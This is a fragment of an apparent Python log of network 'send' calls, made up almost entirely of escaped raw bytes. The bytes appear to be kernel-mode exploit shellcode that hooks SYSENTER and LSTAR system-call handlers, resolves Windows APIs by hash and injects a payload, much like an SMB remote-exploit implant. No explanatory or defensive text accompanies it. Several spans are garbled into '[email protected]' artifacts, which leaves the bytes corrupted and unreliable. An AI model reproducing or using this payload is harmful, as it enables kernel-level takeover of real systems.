xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 14, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 